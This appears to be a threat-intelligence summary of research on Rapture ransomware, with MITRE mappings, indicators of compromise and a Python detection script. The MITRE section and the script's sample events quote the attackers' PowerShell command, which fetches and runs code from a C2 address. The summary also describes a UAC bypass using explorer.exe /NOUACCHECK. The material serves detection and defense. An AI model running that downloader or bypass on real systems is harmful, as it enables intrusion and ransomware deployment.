Rapture, a Ransomware Family With Similarities to Paradise

Rapture is a ransomware family observed in March–April 2023 that is packed with Themida and shows similarities to Paradise yet behaves distinctly. The attackers leverage memory-based execution via a Cobalt Strike beacon, staged through PowerShell and WMI, to deploy the main ransomware quickly and stealthily. #Rapture #Paradise

Keypoints

  • Rapture uses Themida packing and has RSA key configurations similar to Paradise, with .NET 4.0 requirements for execution.
  • The infection runs in memory and through legitimate processes, occasionally dropping to disk as a .log file (e.g., E:\ITS.log, C:\[Redacted]\Aps.log).
  • Ransom note and encrypted-file naming pattern: notes carry a six-character prefix (e.g., 7qzxid-README.txt, qiSgqu-README.txt) and encrypted files receive the same six characters as their extension (e.g., *.7qzxid, *.qiSgqu).
  • Reconnaissance stage checks firewall policies, PowerShell version, and vulnerable Log4J applets before payload delivery.
  • First-stage downloader uses PowerShell to fetch payload from a remote server, then a WMI-based second execution downloads the main Cobalt Strike beacon.
  • Privilege escalation bypasses the CreateExplorerShellUnelevatedTask restriction by launching explorer.exe with /NOUACCHECK, so it inherits the elevated status of its parent, then drops and executes the second-stage payload.

MITRE Techniques

  • [T1059.001] PowerShell – First-stage downloader uses PowerShell to download payload from a remote URL. Quote: “/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object Net.WebClient).DownloadString('[hxxp]://195.123.234[.]101:80/Sharepoint/Pickers.aspx')”
  • [T1047] Windows Management Instrumentation – Second execution instance is done via WMI. Quote: “the second execution instance, this time from Windows Management Instrumentation (WMI), is done via the following command:”
  • [T1105] Ingress Tool Transfer – Downloads and installs the Cobalt Strike beacon after reconnaissance. Quote: “downloading and executing a PowerShell script to install Cobalt Strike in the target’s system.”
  • [T1055] Process Injection – Ransomware activities injected into an existing svchost.exe (parent process) and executed via /NOUACCHECK. Quote: “the malicious actors injected the malicious activity into an existing svchost.exe, which serves as the parent process. The svchost.exe process then executes explorer.exe using the /NOUACCHECK.”
  • [T1027] Obfuscated/Compressed Files and Information – The C2 response carries the encrypted beacon embedded in the middle of a JavaScript file. Quote: “the data response from the C&C server contains the encrypted beacon sandwiched in the middle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain).”
  • [T1071.001] Web Protocols – C2 communications leverage web channels with JavaScript-wrapped payloads. Quote: “the response of the C&C server is sandwiched in another JavaScript code that will be decoded by the beacon.”
  • [T1548.002] Bypass User Account Control – Privilege escalation via /NOUACCHECK and CreateExplorerShellUnelevatedTask. Quote: “By default, there is a task in newer versions of Windows called CreateExplorerShellUnelevatedTask that prevents explorer.exe from running with elevated privileges. However, if explorer.exe is launched using the command line /NOUACCHECK, it inherits the elevated status from the parent process.”
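
As an added example (not code from the Trend Micro report), the following Python sketches detection logic for three artifacts described in the Keypoints and MITRE lists above: the aliased Invoke-Expression downloader command line (T1059.001), explorer.exe launched with /NOUACCHECK from an svchost.exe parent (T1548.002), and the six-character marker shared between ransom note names and encrypted-file extensions. The event shape and all sample events are constructed for illustration.

```python
import json
import re

# Constructed sample telemetry (not from the report): process- and file-creation
# events in a Sysmon-like JSON shape, one event per line. The URL is defanged.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"type": "process", "parent": "WmiPrvSE.exe", "image": "cmd.exe",
                "cmdline": "/c powershell set-alias -name aspersky -value Invoke-Expression;"
                           "aspersky(New-Object Net.WebClient).DownloadString("
                           "'hxxp://195.123.234[.]101:80/Sharepoint/Pickers.aspx')"}),
    json.dumps({"type": "process", "parent": "svchost.exe", "image": "explorer.exe",
                "cmdline": "explorer.exe /NOUACCHECK"}),
    json.dumps({"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
                "cmdline": "notepad.exe report.txt"}),
    json.dumps({"type": "file", "path": r"C:\Users\bob\Documents\7qzxid-README.txt"}),
    json.dumps({"type": "file", "path": r"C:\Users\bob\Documents\budget.xlsx.7qzxid"}),
    json.dumps({"type": "file", "path": r"C:\Users\bob\Documents\notes.txt"}),
])

# T1059.001: Set-Alias pointing at Invoke-Expression, followed by a web DownloadString
IEX_ALIAS_DOWNLOAD = re.compile(
    r"set-alias\s+-name\s+\S+\s+-value\s+invoke-expression.*downloadstring", re.I)
# Ransom note name: six alphanumerics + -README.txt; the same six chars become the extension
README_NOTE = re.compile(r"^(?P<marker>[A-Za-z0-9]{6})-README\.txt$", re.I)


def detect(events_text):
    """Return (rule, detail) hits found in newline-delimited JSON events."""
    hits, files = [], []
    for line in events_text.splitlines():
        ev = json.loads(line)
        if ev["type"] == "file":
            files.append(ev["path"])
            continue
        cmd = ev["cmdline"]
        if IEX_ALIAS_DOWNLOAD.search(cmd):
            hits.append(("T1059.001 aliased IEX downloader", cmd))
        if (ev["image"].lower() == "explorer.exe" and "/nouaccheck" in cmd.lower()
                and ev["parent"].lower() == "svchost.exe"):
            hits.append(("T1548.002 explorer.exe /NOUACCHECK from svchost.exe", cmd))
    # Notes first: their six-character marker tells us which extension to treat as encrypted
    names = [p.rsplit("\\", 1)[-1] for p in files]
    markers = {m.group("marker").lower() for n in names if (m := README_NOTE.match(n))}
    for path, name in zip(files, names):
        if README_NOTE.match(name):
            hits.append(("ransom note", path))
        elif name.rsplit(".", 1)[-1].lower() in markers:
            hits.append(("encrypted file with note marker", path))
    return hits
```

Calling detect(SAMPLE_EVENTS) returns four hits, one per constructed malicious event and none for the benign ones. Because Windows itself can launch explorer.exe /NOUACCHECK from a scheduled task hosted in svchost.exe, treat the T1548.002 rule as a correlation lead to pair with the preceding PowerShell or WMI activity rather than a standalone alert.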

Indicators of Compromise

  • [IP] C2 server – 195.123.234[.]101 (examples: 195.123.234[.]101/Sharepoint/Pickers.aspx, 195.123.234[.]101/Microsoft/Online)
  • [File name] Ransom note/folder markers – 7qzxid-README.txt, qiSgqu-README.txt
  • [File extension] Encrypted file extensions – *.7qzxid, *.qiSgqu
  • [Log file] Local drop logs – E:\ITS.log, C:\[Redacted]\Aps.log

Read more: https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html